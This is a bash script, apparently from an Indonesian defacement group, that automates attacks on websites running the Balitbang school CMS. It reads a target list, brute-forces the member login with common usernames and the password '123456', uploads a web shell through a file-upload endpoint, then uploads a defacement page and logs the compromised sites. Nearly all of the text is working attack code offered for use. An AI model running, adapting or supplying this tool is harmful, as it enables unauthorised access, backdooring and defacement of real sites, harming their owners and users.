Balitbang Auto

1. #!/bin/bash
2. CookieD=cookie.txt
3. cek(){
4. path="/member/index.php"
5. path2="/member/ajax_login.php"
6. path3="/functions/simmateriguru.php"
7. path4="/materi/file.php"
8. path5="/k.php"
9. site=${target}${path}
10. site2=${target}${path2}
11. site3=${target}${path3}
12. site4=${target}${path4}
13. site5=${target}${path5}
14.  
15.  
16. curl --silent --max-time 60 --connect-timeout 50 "$site" | grep -i "login" >/dev/null;asa=$?
17. if [ $asa -eq 0 ];then
18. echo ""
19. echo -e "\033[1;32m# $target <= gw brute dulu ya..\E[0m"
20. bruteforce
21. else
22. echo ""
23. echo -e "\033[1;31m# $target <= ngk vuln\E[0m"
24.  
25. fi
26. }
27.  
28. bruteforce(){
29. for brute in kepsek masjava taufik tomi alan siswanto wardjana kickdody choirulyogya alumni hafidz 070810120 farhan
30. do
31.  
32. curl --cookie $CookieD --cookie-jar \
33. $CookieD --silent $site2 \
34. --data "user_name=$brute&password=123456" -o ckck.txt
35. cek2
36. done
37.  
38. }
39.  
40. cek2(){
41. cat ckck.txt | grep -i "yes" >/dev/null;wow2=$?
42. if [ $wow2 -eq 0 ];then
43. echo -e "\033[1;32m# $site <= $brute | 123456\E[0m"
44. ng
45.  
46. else
47. echo -e "\033[1;31m# $brute <= bukan ini\E[0m"
48.  
49.  
50. fi
51.  
52. }
53.  
54. ng(){
55.  
56. echo "# Lgi coba upload Shell"
57. curl --silent --cookie $CookieD --max-time 10 --connect-timeout 10 -o ckck.txt \
58. -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
59. -F "file=@${uploader}" \
60. --request POST "$site3"
61. cek3
62. }
63.  
64. cek3(){
65. curl --cookie $CookieD --silent --max-time 60 --connect-timeout 50 "$site4" | grep -i "ganteng" >/dev/null;wow3=$?
66. if [ $wow3 -eq 0 ];then
67. echo -e "\033[1;35m# $site4 <= berhasil nanem Shell\E[0m"
68. echo "$site4 <= Backdoored" >> Deface.txt
69. uploadDeface
70.  
71. else
72. echo -e "\033[1;31m# $target <= ngk berhasil Shell\E[0m"
73. break
74. fi
75. }
76.  
77. uploadDeface(){
78. echo "# lgi pengen nge-deface..."
79. curl --silent --cookie $CookieD --max-time 10 --connect-timeout 10 -o ckck.txt \
80. -F "file3=@${scriptdeface}" \
81. --request POST "$site4"
82. cek4
83. }
84.  
85. cek4(){
86. curl --silent --max-time 60 --connect-timeout 50 "$site5" | grep -i "Hacked" >/dev/null;wow4=$?
87. if [ $wow4 -eq 0 ];then
88. echo -e "\033[1;32m# $site5 <= Defaced\E[0m"
89. echo "$site5 <= Defaced" >> Deface.txt
90. echo "nb: Jangan buka shell klo ngk mau file pepesan ilang"
91. echo ""
92. break
93. else
94. echo -e "\033[1;31m# $target <= ngk berhasil Nge-Deface\E[0m"
95.  
96. `rm ckck.txt`
97. break
98. fi
99. }
100.  
101.  
102.  
103. echo "# Exploiter Balitbang"
104. echo -e "# \033[1;32mIndoXploit\E[0m"
105. echo -e "# thx to: \033[1;31mDrs.Malware\E[0m | \033[1;34mAmbarawa Cyber Army\E[0m | You"
106. echo " "
107. read -p "Masukan List Target: " Target
108. if [ ! -f $Target ];then
109. echo "File ${Target} Tidak Ada.. "
110. exit
111. fi
112. read -p "Masukan Shell: " uploader
113. if [ ! -f $uploader ];then
114. echo "Shell Tidak Ada"
115. exit
116. fi
117. read -p "Masukan Script Deface: " scriptdeface
118. if [ ! -f $scriptdeface ];then
119. echo "Script Deface Tidak Ada"
120. exit
121. fi
122. echo " "
123. echo -e "\033[1;34m# Wait.."
124. for target in `cat $Target`
125. do
126. cek
127. done